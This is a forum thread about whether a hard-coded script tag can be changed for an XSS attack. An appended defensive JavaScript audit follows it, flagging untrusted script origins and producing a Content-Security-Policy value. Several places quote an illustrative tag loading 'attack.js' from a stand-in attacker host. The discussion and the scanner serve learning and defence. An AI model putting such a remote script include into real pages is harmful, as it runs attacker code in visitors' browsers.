Sunday, April 19, 2015
Author

Javascript XSS vulnerability


Member


Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 12-09-08 22:48
Just a thought I had. I'm not too good with JavaScript or JavaScript vulnerabilities, but I know the basics pretty well. Anyway, theoretically, let's say there is a web page that executes a script when the web page loads in a separate directory on the server, so that the HTML code would look like this:

Code
<script src="file:///C:/Javascripts/MyScript.js"></script>




To me... this just seems very vulnerable to an XSS attack if you can change the src, for example:

Code
<script src="http://www.attacksite.com/attack.js"></script>




But to my knowledge the JavaScript is hard-coded into the HTML and cannot be changed. Any ideas if you can actually change the path to the script, or am I safe?




Edited by rex_mundi on 11-12-13 13:48
Author

RE: Javascript XSS vulnerability?

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 12-09-08 22:49
You can't change the hard-coded (no variable) settings. Oh, and you're not safe.

Edit: Actually, you can change hard-coded settings if you can regex+replace with some XSS.

Anyway, stop asking and start learning. I advise ha.ckers.org and sla.ckers.org if you want to learn about XSS, and Webappsec in general.




Edited by spyware on 12-09-08 23:25
Author

RE: Javascript XSS vulnerability?


Member


Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-09-08 00:53
leoneo11 wrote:
But to my knowledge the JavaScript is hard-coded into the HTML and cannot be changed. Any ideas if you can actually change the path to the script, or am I safe?


Both the Javascript and the Javascript include can be changed if you're rendering the page in something that lets you modify the source in place (PHP cURL, C# w/ MSHTML, even Opera should). I used to do this with MSHTML and my last workplace's CMS to automate the page while eliminating those pesky JS pop-ups. HTML and Javascript are both client-side once they're rendered... which is why GreaseMonkey even works.


Author

RE: Javascript XSS vulnerability?

Uber0n
Member



Posts: 1963
Location: Sweden
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 13-09-08 08:30
leoneo11 wrote:
Anyway, theoretically, let's say there is a web page that executes a script when the web page loads in a separate directory on the server, so that the HTML code would look like this:

Code
<script src="file:///C:/Javascripts/MyScript.js"></script>



I'd say this wouldn't work, since the javascript is executed on the client's computer and not on the server. It'd rather look like this:
Code
<script src="Javascripts/MyScript.js"></script>




To me... this just seems very vulnerable to an XSS attack if you can change the src, for example:

Code
<script src="http://www.attacksite.com/attack.js"></script>



I understand what you mean, but you can't simply edit a hard coded HTML file just like that. Like spyware said, practical experience is very good. Get training ;)

http://www.xssed.. . .


Nope http://uber0n.webs.com/
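
An added example, not part of any post in this thread: a JavaScript audit that lists every script source on a page, resolves it the way a browser would, and flags anything outside an origin allowlist, together with the matching Content-Security-Policy value. The function names, `PAGE_URL` and `SAMPLE_HTML` are assumptions constructed for illustration.

```javascript
// Added example; names, PAGE_URL and SAMPLE_HTML are constructed for illustration.
// Regex extraction is a simplification: a production audit should use a real HTML parser.
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Classify every external script on a page against an origin allowlist.
function auditScriptSources(html, pageUrl, extraOrigins = []) {
  const allowed = new Set([new URL(pageUrl).origin, ...extraOrigins]);
  const findings = [];
  for (const m of html.matchAll(SCRIPT_SRC)) {
    const src = m[1] ?? m[2] ?? m[3];
    let url;
    try {
      url = new URL(src, pageUrl); // resolve relative paths the way the browser does
    } catch {
      findings.push({ src, verdict: "unparseable" });
      continue;
    }
    let verdict;
    if (url.protocol === "file:") verdict = "local-file"; // path on the visitor's disk, not the server
    else if (!/^https?:$/.test(url.protocol)) verdict = "unexpected-scheme";
    else if (allowed.has(url.origin)) verdict = "allowed";
    else verdict = "untrusted-origin"; // a src that does not belong to the site
    findings.push({ src, resolved: url.href, verdict });
  }
  return findings;
}

// Content-Security-Policy value that makes the browser enforce the same allowlist,
// so a <script src> pointing at any other origin is refused.
function scriptSrcPolicy(extraOrigins = []) {
  return ["script-src", "'self'", ...extraOrigins].join(" ");
}

const PAGE_URL = "https://www.example.com/index.html";
const SAMPLE_HTML = `
<script src="file:///C:/Javascripts/MyScript.js"></script>
<script src="Javascripts/MyScript.js"></script>
<script src="http://www.attacksite.com/attack.js"></script>`;

console.log(auditScriptSources(SAMPLE_HTML, PAGE_URL));
console.log(scriptSrcPolicy());
```

The three sample tags are the ones discussed in the thread; the policy string is what a server would send in its `Content-Security-Policy` response header.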